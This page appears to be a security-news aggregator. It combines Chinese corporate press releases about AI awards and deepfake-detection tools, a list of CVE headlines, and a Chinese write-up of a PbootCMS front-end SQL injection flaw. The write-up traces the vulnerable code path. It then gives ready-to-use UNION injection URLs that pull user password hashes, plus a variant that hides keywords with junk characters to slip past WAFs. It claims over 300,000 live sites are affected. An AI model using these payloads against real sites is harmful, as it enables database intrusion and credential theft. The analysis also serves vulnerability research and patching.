Aggregator
一周网安优质PDF资源推荐丨FreeBuf知识大陆
Личное в публичное: как простой вызов такси оборачивается потерей данных
Submit #461109: Amcrest IP2M-841W, IPC-IP3M-HX2B, IPC-IP2M-841B, IPC-IPM-721S, IPC-IP3M-943B, IPC-IP3M-943S, IP2M-841B N/A Information Disclosure [Accepted]
国投智能(美亚柏科)在第五届中国人工智能大赛斩获三个赛道A级证书
国投智能(美亚柏科)在第五届中国人工智能大赛斩获三个赛道A级证书
滕达董事长与获奖团队代表合影
美亚柏科智慧安防事业部总经理黄仝宇博士在下午举行的“人工智能赋能行业应用创新论坛”上作《AI助力打造公共安全新质生产力》主题演讲。他表示,AI大模型出现和落地给安防行业带来了新的发展机遇,它将引领智慧安防的新未来。AI大模型赋能安防,使安防系统具备强大的理解和分析能力,大幅提升现有安防系统的智能化水平和效率,并拓展安防应用的深度和广度,为发展安防新质生产力赋能。
今年9月,在国家互联网信息办公室、公安部指导下,厦门市人民政府主办的第五届中国人工智能大赛正式启动,围绕人工智能安全治理和创新发展两大主线设置了赛题。作为网络空间安全与社会治理领域国家队,国投智能2017年成立AI研发中心,为了应对利用人工智能技术可能带来的安全问题,2019年针对深度合成技术又特别成立专项研究团队,2024年,公司提出“All in AI”战略,整合各产品线的人工智能研发力量,新组建人工智能研究院,突出围绕公共安全大数据和电子数据取证业务需求开展人工智能大模型技术研究,支撑公司产品和技术向人工智能大模型的转型升级,构建公共安全领域的新质生产力。
基于公司在人工智能技术和公共安全业务领域长期和深度的业务知识积累,研发发布了国内首个公共安全领域大模型产品-美亚“天擎”公共安全系列大模型产品,入选 “2023中国大模型TOP70榜单”。
此次获奖是对国投智能在人工智能领域技术实力的高度认可。未来,国投智能将聚焦大模型技术应用、生成式人工智能和人工智能安全三个核心方向,踔厉奋发,持续发力,不断打磨推出更为安全、可信、可靠的人工智能技术产品,为打击利用人工智能的新型涉网犯罪,提供有力的技术武器,为维护和保障人工智能的健康发展和规范应用贡献力量!CVE-2024-56527 | tecnick tcpdf up to 6.7.x Error Message cross site scripting
CVE-2024-56522 | tecnick tcpdf up to 6.7.x Tag Hash unserializeTCPDFtag comparison
CVE-2024-56521 | tecnick tcpdf up to 6.7.x certificate validation
CVE-2024-56519 | tecnick tcpdf up to 6.7.x SVG setSVGStyles font-family Privilege Escalation
CVE-2024-11921 | GiveWP Plugin up to 3.18.x on WordPress cross site scripting
CVE-2024-11645 | Float Block Plugin up to 1.7 on WordPress Setting cross site scripting
CVE-2024-11644 | WP-SVG Plugin up to 0.9 on WordPress Shortcode Attribute cross site scripting
CVE-2024-11842 | Weight DN Shipping for WooCommerce Plugin up to 1.1 on WordPress Setting cross-site request forgery
CVE-2024-56520 | tecnick tcpdf up to 6.7.x tc-lib-pdf-font Privilege Escalation
AI伪造图像鉴定能力验证计划相关通知发布!国投智能护航人工智能安全发展
AI伪造图像鉴定能力验证计划相关通知发布!国投智能护航人工智能安全发展
近日,中国合格评定国家认可委员会(CNAS)秘书处发布《关于组织开展人工智能伪造图像鉴定能力验证计划的通知》,邀请从事AI伪造图像检验检测鉴定的执法机构、有关检验检测机构和从事AI伪造图像检测鉴定研究的企事业单位参加相关鉴定能力的验证,以促进人工智能(AI)安全治理行业技术发展,加强各相关机构对AI伪造图像检验鉴定的质量管理,建立不同图像鉴定方法/系统的有效性和可比性。、
作为网络空间安全与社会治理领域国家队,国投智能2017年成立AI研发中心,为了应对利用人工智能技术可能带来的安全问题,2019年针对深度合成技术又特别成立专项研究团队,2024年公司还提出了“All in AI”战略,用AI技术全面赋能产品。通过对深度合成和生成式AI技术的深入研究以及在人工智能安全方向的经验积累,公司AI团队自主研发深度伪造视频图像检测鉴定的核心引擎,推出了AI-3300慧眼视频图像鉴真工作站、人工智能大模型内容检测平台、“美亚内容鉴真平台”微信小程序等,全面支持人工智能生成视频图像、音频和文本等多媒体内容的检测溯源。
其中,AI-3300慧眼视频图像鉴真工作站是一款以人工智能技术为核心的视频图像检验鉴定设备,具有智能鉴定和专业鉴定两种鉴定模式,涵盖40余种鉴定算法,近10种深伪鉴定算法,针对ps篡改,深伪合成,AI生成的视频图像进行检测鉴定,支持卷宗管理和报告生成,为鉴定人员提供一站式视频图像检验鉴定服务。并且符合GA/T1021-2013《视频图像原始性检验技术规范》、GA/T 1022-2013《视频图像真实性检验技术规范》、SF/T 0119-2021《声像资料鉴定通用规范》、SF/T 0153—2023《图片真实性鉴定技术规范》、SF/T 0148-2023《合成人脸图像鉴定技术规范》等视频图像真实性、原始性、合成人脸检验鉴定技术规范标准,可有效支持本次人工智能伪造图像鉴定能力验证的要求。
AI-3300慧眼视频图像鉴真工作站
“美亚内容鉴真平台”微信小程序是国投智能全资子公司美亚柏科研发的一款针对AI合成、生成的图像、视频、文本等虚假信息的检测小工具,致力于帮助用户查证信息的准确性。目前支持ChatGPT、ChatGLM、Qwen、Moss等13种国内外主流大模型产品生成文本的检测;支持Stable-Diffusion、Midjourney、DALLE、FLUX等30余种主流算法生成图像的检测;支持Sora、Open-Sora、Runway Gen-2等10余种主流算法生成视频的检测;支持DeepfaceLab、FOMM、Wav2Lib等40余种主流AI合成算法所合成的图像和视频的检测。
国投智能将持续聚焦生成式人工智能和AI生成内容的检测识别技术,踔厉奋发,持续发力,按照相关管理要求,针对深度合成生成文本、视频、图像的检测鉴定技术、生成式人工智能技术、人工智能安全取证技术等方面的应用需求,不断打磨推出更为安全、可信、可靠的人工智能技术产品,为打击利用人工智能的新型涉网犯罪,提供有力的技术武器,为维护和保障人工智能的健康发展和规范应用贡献力量!
PbootCMS前台SQL注入漏洞(下)
PbootCMS前台SQL注入漏洞(下)
在前一篇文章中介绍了一个仍然可以用于最新版PbootCMS的老漏洞DVB-2021-2510,并对漏洞流程进行分析,给出了在有限条件下利用漏洞的方式。
本文将在前一篇文章的基础上继续给出新的PbootCMS SQL注入漏洞,并对利用方式进行更深入的探讨。
0x02漏洞分析由于PbootCMS使用了模板的方法来组合产品页面内容,为了支持可扩展性,支持非常复杂的语法,对基础内容想了解的可以先看文章https://xz.aliyun.com/t/14090。
apps/home/controller/TagController.php文件中,会把外部传入的数据get('tag')替换模板文件中的内容。
图 1
这里的get('tag')和上一篇文章中的request($key, 'vars')有一个很大的区别是没有第二个参数,我们跟进get方法,看一下没有第二个参数的传值有哪些限制。
图 2
如果没有传入第二个参数,默认值为null。跟进filter方法,可以看出在filter对类型和数据的安全检查中,第二个参数为null并不会命中任何一个条件判断,也就是不会对数据值进行任何限制。这里因为$condition['d_type']为null也不会因此而报错。
图 3
虽然数据类型检测,但是filter方法中仍然有对其值的过滤方式,会替换很多标签相关的内容。这里需要重点标记一下,因为后面的SQL注入要用到这里过滤不完整的标签。
图 4
回到图1的代码中,外部传入的get('tag')经过方法parserPositionLabel会替换模板文件中的部分内容,跟进parserPositionLabel方法。
图 5
这里外部传入的数据变成了变量$link,并且经过替换之后响应到页面的标签的href属性中。这里假设我们传入了{pboot:xxx},只要不在图4禁止的pboot标签中,则可能导致标签注入。pboot支持的标签有很多,具体要用哪个标签来达到漏洞利用的效果,还需要继续往下面跟进。
在图1的代码中继续往下,跟进parserAfter方法,这个方法中会解析大多数pboot标签。
图 6
我们这里用到的是parserListLabel方法,这个方法的主要作用是解析数据列表,至于是不是还有其它的方法也可以利用,小伙伴可以自行探索。继续跟进parserListLabel方法。
图 7
如果我们传入的get('tag')的值中包含了{pboot:list}标签,则会按照parserListLabel方法中的解析逻辑对其中的值进行正则提取,并保存到变量$params中。具体parserParam的函数我就不跟了,其实就是简单的正则提取,我们继续往下跟进$params变量的处理逻辑。
图 8
当$params的键名是filter时,也就是外部传入的参数为{pboot:list filter=xxx [list:link link=asd]{/pboot:list}。会把xxxx设置为变量$filter的值,继续跟下面的调用逻辑。
图9
按照|对$filter进行切割之后,其中$filter[0]会直接拼接到$where1数组的值中,从这里已经可以看出来似乎进行了SQL语句的可控拼接。继续往下看一下$where1变量的调用逻辑。
图10
和上一篇文章的逻辑相似,上一篇文章的注入点在getList方法的参数$where3,这次的注入在参数$where1。跟进getList方法。
图11
外部传入的$where1变量会直接进入where方法中,从图9可以看出这里的filter时一个数组,并且其键名为数字。
图12
这也就导致了SQL注入漏洞。
0x03漏洞利用从本质上来说此漏洞的漏洞利用要比上一篇文章的利用简单,因为这里不涉及对特殊字符的限制,而且这里有回显可以进行联合注入。在本地搭建的演示环境中进行测试,利用下面的payload查询ay_user表第一个用户的密码字段
http://localhost:8890/PbootCMS329?tag=xxx:%7bpboot%3alist%20filter%3d1%3d2%29UNION%2f%2a%2a%2fSELECT%2f%2a%2a%2f1,2,3,4,5,(select/**/password/**/from/**/ay_user/**/limit/**/0,1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%2f%2a%2a%2f%23%2f%2a%2a%2f%7c123%20scode%3d123%7d%5blist%3alink%20link%3dasd%5d%7b%2fpboot%3alist%7d
查看源代码,会在如下位置回显对应的结果信息
图13
这里面有几个注意点是需要说明的
1)payload不允许用空格,因为在图7解析{pboot:list}标签时调用的parserParam方法按照空格进行截断,如下所示。
图14
2) 注释符问题。对于mysql数据库,这里只能使用#单行注释,而不能使用--单行注释;对于sqlite数据库,这里只能使用--单行注释,而不能使用#单行注释。这主要还是空格的原因,我通过下面一张表来说明这个小技巧。
语句
数据库
备注
select 1 --a
mysql
语法错误,--后面必须有空白字符
select 1 --/**/a
mysql
语法错误,--后面必须有空白字符
select 1 -- a
mysql
语法正确
select 1 #a
mysql
语法正确
select 1 # a
mysql
语法正确
select 1 --a
sqlite
语法正确,--后面可以没有空格
select 1 -- a
sqlite
语法正确
select 1 #a
sqlite
语法错误,不支持#注释
select 1 # a
sqlite
语法错误,不支持#注释
因为PbootCMS的payload不允许使用空格,所以造成了一个很奇怪的结论。
3) 在实网环境下,不同的站点union select的函数是不一样的,要基于实际情况进行调整。
虽然我们现在已经能完全的对目标进行注入(包括mysql和sqlite两种数据库),而且是有回显的联合查询,但是当前的payload特征非常明显,极易被WAF查杀。有没有某种绕过WAF的方式呢?
当然是有的,PbootCMS有复杂的模板替换逻辑,只要找一个字符串替换为空的操作,然后在关键字中一直插入干扰字符,就可以轻易绕过WAF,如果你现在倒回去看一下图4,你就会发现x3e|x3c会是一个不错的选择,例如你可以使用使用下面的payload
http://localhost:8890/PbootCMS329?tag=xxx:%7bpboot%3alist%20filter%3d1%3d2%29UNIx3eON%2fx3e%2a%2a%2fSELx3eECT%2fx3e%2a%2a%2f1,2,3,4,5,(selx3eect/**/pax3essword/**/frx3eom/x3e**/ay_user/**/lix3emit/x3e**/0,1),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29%2f%2a%2a%2f%23%2f%2a%2a%2f%7c123%20scode%3d123%7d%5blist%3alink%20link%3dasd%5d%7b%2fpboot%3alist%7d
0x04 结论当前我们已经能无限制的对PbootCMS进行SQL注入了,有超过30W的互联网案例都受此漏洞影响。我认为这是2024最好用的漏洞,你觉得呢?